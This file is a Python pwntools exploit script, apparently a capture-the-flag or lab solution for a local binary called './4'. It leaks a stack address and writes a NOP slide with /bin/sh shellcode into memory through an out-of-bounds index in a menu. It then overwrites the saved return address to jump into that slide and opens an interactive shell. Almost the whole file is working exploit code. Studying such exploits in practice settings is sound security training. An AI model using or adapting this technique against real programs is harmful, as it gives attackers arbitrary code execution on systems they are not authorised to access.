#!/usr/bin/env python3
# -*- coding: utf-8 -*-
# This exploit template was generated via:
# $ pwn template
from pwn import *
from ctypes import *  # only c_long is used, for the signed 64-bit reinterpretation in the write loop
# Set up pwntools for the correct architecture
context.update(arch='amd64')
# Chained assignment: exe and context.binary both receive the string './4'
# (pwntools wraps the context attribute in an ELF; exe itself stays the path).
exe = context.binary ='./4'
# Many built-in settings can be controlled on the command-line and show up
# in "args". For example, to dump all data sent/received, and disable ASLR
# for all created processes...
# ./exploit.py DEBUG NOASLR
def start(argv=[], *a, **kw):
    '''Start the exploit against the target.

    Launches ``exe`` with ``argv`` appended to its command line. When the
    pwntools ``GDB`` flag is present in ``args`` the process is started under
    gdb with the module-level ``gdbscript``; otherwise it is a plain
    ``process``. Extra positional/keyword arguments are forwarded unchanged.
    The mutable default ``argv`` is never modified here, so sharing it across
    calls is harmless.
    '''
    command = [exe] + argv
    if args.GDB:
        # gdbscript is a module-level name defined later in the file; it only
        # needs to exist by the time start() is called.
        return gdb.debug(command, gdbscript=gdbscript, *a, **kw)
    return process(command, *a, **kw)
# Specify your GDB script here for debugging
# GDB will be launched if the exploit is run via e.g.
# ./exploit.py GDB
gdbscript = '''
continue
'''.format(**locals())
#===========================================================
# EXPLOIT GOES HERE
#===========================================================
# NOTE(review): indentation below was restored from a flattened paste; the
# loop body and the single if-branch are the only indented regions.
# The whole run is a menu-driven dialogue with the local binary './4'; the
# prompt strings are taken verbatim from that program's output. str and
# bytes are mixed as tube arguments — pwntools encodes str itself (newer
# versions emit a warning for it).
io = start()
# 304 one-byte NOPs precede the payload; shellcode is pwntools' stock amd64
# /bin/sh stub.
nopslide=asm(
"nop\n"*304
)
shellcode = asm(shellcraft.amd64.sh())
#get stack addr
# Menu option 2 with a size of 15 makes the program print something after
# "for: "; the integer up to the next "1)" is kept as the leak. The original
# comment says this is a stack address — not verifiable from the script alone.
io.recvuntil("Exit\n")
io.send(b"2\n")
io.recvuntil(b"read?")
io.send(b"15\n")
io.recvuntil("for: ")
dataleak=int(io.recvuntil(b"1)").split(b"1)")[0])
p=nopslide+shellcode
print("dataleak: 0x%x"%dataleak)
# Menu option 1: index -1, then a value far outside the signed 64-bit range.
# What the program does with this pair is not visible here — TODO confirm
# against the binary.
io.recvuntil(b"Exit\n")
io.send(b"1\n")
io.recvuntil("number\n")
io.send(b"-1\n")
io.recvuntil("number!\n")
io.send(b"99999999999999999\n")
# Write the payload 8 bytes at a time through menu option 1: index 16+i,
# then the chunk as a little-endian integer. Because the loop runs
# len(p)//8 times, any tail of p that is not a full 8 bytes is silently
# dropped (len(p) is 304 + len(shellcode)).
for i in range(len(p)//8):
    io.recvuntil("Exit\n")
    io.sendline("1")
    io.recv()
    io.sendline(str(16+i))
    shellcode_part = p[0+8*i:i*8+8]
    shellcode_int = int.from_bytes(shellcode_part, byteorder='little')
    print(shellcode_part)
    print(str(shellcode_int))
    # Values with the top bit set are reinterpreted as signed so the program's
    # integer parser accepts them; c_long is 64-bit on LP64 Linux, the only
    # platform an amd64 pwntools script runs against (it would be 32-bit on
    # Windows and truncate).
    if(shellcode_int > 0x7fffffffffffffff):
        shellcode_int = (c_long(shellcode_int)).value
    io.sendline(str(shellcode_int))
#modify to enter the nopslide
# Move the leaked address 120 bytes lower so it lands inside the NOP run,
# then store it at index 66 (the original comment calls this "rbp + 1").
# NOTE(review): the -120 offset and index 66 are binary-specific constants
# with no derivation in the script.
dataleak-=120
io.recvuntil("Exit")
io.sendline("1")
io.recv()
io.sendline(str("66")) #rbp + 1
io.sendline(str(dataleak))
io.recv()
# "0" presumably selects the menu's exit entry so the function returns —
# TODO confirm against the binary.
io.send("0\n")
#print("0x%x"%addr)
#io.send(padding+addr)
#io.send(nopslide+shellcode+b"\n")
io.interactive()